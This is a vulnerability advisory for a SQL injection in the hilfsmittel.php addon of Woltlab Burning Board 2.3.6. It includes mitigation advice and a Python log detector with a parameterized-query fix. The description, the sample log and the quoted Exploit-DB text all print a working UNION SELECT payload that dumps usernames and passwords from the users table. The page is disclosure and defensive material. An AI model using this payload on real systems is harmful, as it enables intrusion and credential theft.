Vendor: Burning Board
By: Crazyball
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Burning Board
Affected Version From: 2.3.2006
Affected Version To: 2.3.2006
Patch Exists: N/A
Related CWE: N/A
CPE: a:woltlab:burning_board:2.3.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in the hilfsmittel.php file of the Hilfsmitteldatenbank addon for Woltlab Burning Board 2.3.6: the value of the 'katid' parameter is placed into a SQL query, so an attacker can inject SQL via that parameter. The vulnerability is triggered by sending a specially crafted HTTP request to the vulnerable application, such as http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*, which can be used to extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries instead of building SQL statements dynamically from request input. Additionally, a web application firewall can be configured in front of the application to detect and block malicious requests.
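As an added example (not code from the advisory, Exploit-DB or Woltlab), the following Python script shows both sides of the mitigation above: a log check that flags requests whose katid parameter carries a comment-obfuscated UNION SELECT, and the fixed lookup that validates katid as an integer and binds it as a query parameter. The log lines, the hilfsmittel table schema and its rows are constructed for the example; the real addon's schema is not known from the page.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit
# Constructed access-log lines (not from the advisory); the first carries the payload.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /forum/hilfsmittel.php?action=read'
    '&katid=5%27/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10'
    '/**/FROM/**/bb1_users/* HTTP/1.1" 200 5120',
    '198.51.100.3 - - [10/Oct/2023:12:00:02 +0000] "GET /forum/hilfsmittel.php?action=read'
    '&katid=5 HTTP/1.1" 200 2048',
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # closed and unterminated /* ... */
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)

def is_suspicious_katid(value):
    """A legitimate katid is a bare integer; anything else is normalised by turning
    inline comments into spaces, exposing UNION ... SELECT glued together with /**/."""
    if value.isdigit():
        return False
    return UNION_SELECT.search(COMMENT.sub(" ", value)) is not None

def flag_requests(log_lines):
    """Return client IPs of hilfsmittel.php requests whose katid looks injected."""
    flagged = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, url = m.group(1), urlsplit(m.group(2))
        if url.path.endswith("/hilfsmittel.php"):
            # parse_qs URL-decodes the values, so %27 arrives as a literal quote
            for value in parse_qs(url.query).get("katid", []):
                if is_suspicious_katid(value):
                    flagged.append(ip)
    return flagged

def build_demo_db():
    """In-memory stand-in for the addon's table (constructed schema, not the real one)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hilfsmittel (id INTEGER, katid INTEGER, title TEXT)")
    db.executemany("INSERT INTO hilfsmittel VALUES (?, ?, ?)",
                   [(1, 5, "Screen reader"), (2, 5, "Braille display"), (3, 7, "Hearing aid")])
    return db

def read_category(db, katid):
    """Fixed lookup: validate katid as an integer and bind it as a query parameter."""
    if not katid.isdigit():
        raise ValueError("katid must be an integer")
    return db.execute("SELECT id, title FROM hilfsmittel WHERE katid = ?", (int(katid),)).fetchall()
```

The comment stripping matters because a naive check for the literal string "UNION SELECT" would miss the `/**/` form used in the advisory's request.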

Exploit-DB raw data:

#####################################################################################

 > Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability <

#####################################################################################

[+] Author: Crazyball
[+] Vulnerabilities [ SQL Injection ]
[+] Page: http://www.euweb.at/
[+] Language: [ PHP ]
[+] Version: Hilfsmitteldatenbank 1.0 
[+] Date: n/a
[+] Vendor: http://www.woltlab.com/de/

##########################################################################################

[+] Vulnerability

 hilfsmittel.php?action=read&katid=


[+] Exploitable

 http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*